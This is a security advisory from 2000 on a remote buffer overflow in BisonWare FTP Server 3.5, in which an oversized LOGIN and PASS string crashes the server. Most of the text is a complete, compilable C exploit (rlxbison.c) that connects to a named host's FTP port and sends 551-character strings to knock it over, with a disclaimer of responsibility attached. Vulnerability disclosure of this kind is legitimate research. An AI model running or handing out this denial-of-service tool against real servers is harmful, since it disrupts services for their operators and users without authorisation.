"BisonWare is a FTP Server that runs on Windows platform. An intruder can
crash the FTP remotely from outside without the need to log in. Even with no
legitimate account on the system is still possible to attack the FTP
server."
Conde Vampiro
Roses Labs / w00w00
http://www.roses-labs.com
Advanced Security Research.
Roses Labs Security Advisory
----------------------------
Author: Conde Vampiro
Roses Labs Advisory Code: RLA002
Date: 2/29/2000.
Software: BisonWare FTP Server V3.5
Platform: Windows 9x/NT.
Risk: Remote buffer overflow, that allow
to crash the FTP Server. (Maybe also be
possible to execute arbitrary code.)
------------
Introduction
------------
Bison FTP Server is a FTP server that
runs on windows platforms. An intruder can launch
an attack that will crash the FTP server.
------
Detail
------
Sending a "LOGIN" & "PASSWORD" of 550 characters
each, will crash the FTP Server. This is the error that
the FTP will produce:
"Exception EAccessViolation in module BISONFTP.EXE at
0A0D4858. Access vilation at address 0A0D5858. Read of
address 0A0D5858."
----
Code
----
Warning: Neither the Roses Labs or the author accept
any responsibility of the use of this code. This code will
crash the FTP server.
------- CODE START -------
/*
* FILE: rlxbison.c
* CODER: Conde Vampiro.
* DATE: 2/29/2000.
* ABSTRACT: Remote DoS of BISON FTP Server 3.5
*
* Compile: gcc rlxbison.c -o rlbison
*
* Roses Labs / w00w00
* http://www.roses-labs.com
* Advanced Security Research.
*/
#include <stdio.h>
#include <sys/socket.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <unistd.h>
/* Defines */
#define MAX 551
#define MAXDATA 1024
/* Global variables */
int sock;
int i;
char datacrap[MAX];
char *temp;
char tempdata[MAXDATA];
char buf[MAXDATA];
struct hostent *host;
struct sockaddr_in KillFTP;
/* Prototypes */
unsigned long resolve(char *host_name);
char *crap(int num);
/* Main */
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage: %s <Host>\n", argv[0]);
exit(-1);
}
KillFTP.sin_family=AF_INET;
KillFTP.sin_addr.s_addr=resolve(argv[1]);
if(!KillFTP.sin_addr.s_addr) {
printf("Host Unkown: %s\n",argv[1]);
exit(-1);
}
KillFTP.sin_port=htons(21);
sock=socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0) {
printf("Error creating socket!!\n");
exit(-1);
}
if(!connect(sock,(struct sockaddr *)&KillFTP, sizeof(KillFTP))) {
printf("Roses Labs Bison FTP Xploit\n");
printf("Remote crashing code!!!\n");
recv(sock,tempdata,sizeof(tempdata),0);
sleep(1);
recv(sock,tempdata,sizeof(tempdata),0);
temp=crap(MAX);
sprintf(buf,"LOGIN %s\n",temp);
send(sock,buf,strlen(buf),0);
sprintf(buf,"PASS %s\n",temp);
send(sock,buf,strlen(buf),0);
printf("Host %s crashed!!\n",argv[1]);
exit(0);
} else {
printf("Couldn't connect to %s on port 21,\n", argv[1]);
exit(-1);
}
if(close(sock)) {
printf("Error closing socket!!\n");
exit(-1);
}
return(0);
}
/* Functions */
unsigned long resolve(char *host_name) {
struct in_addr addr;
struct hostent *host_nam;
if((addr.s_addr = inet_addr(host_name)) == -1) {
if(!(host_nam = gethostbyname(host_name))) return(0);
memcpy((char *) &addr.s_addr, host_nam->h_addr, host_nam->h_length);
}
return(addr.s_addr);
}
char *crap(int num) {
for(i=0;i<num;i++) {
datacrap[i]='X';
}
return(datacrap);
}
/* w00w00 E0F */
------- CODE END -------
---
Fix
---
This problem is fixed in V4.1 out soon.
----
Note
----
This bug was found using Cyber Host
Auditor (CHA). CHA is a security tool coded by
The Roses Labs to discover in a easy way DoS &
possible buffer overflows.
Roses Labs / w00w00
http://www.roses-labs.com
Advanced Security Research.
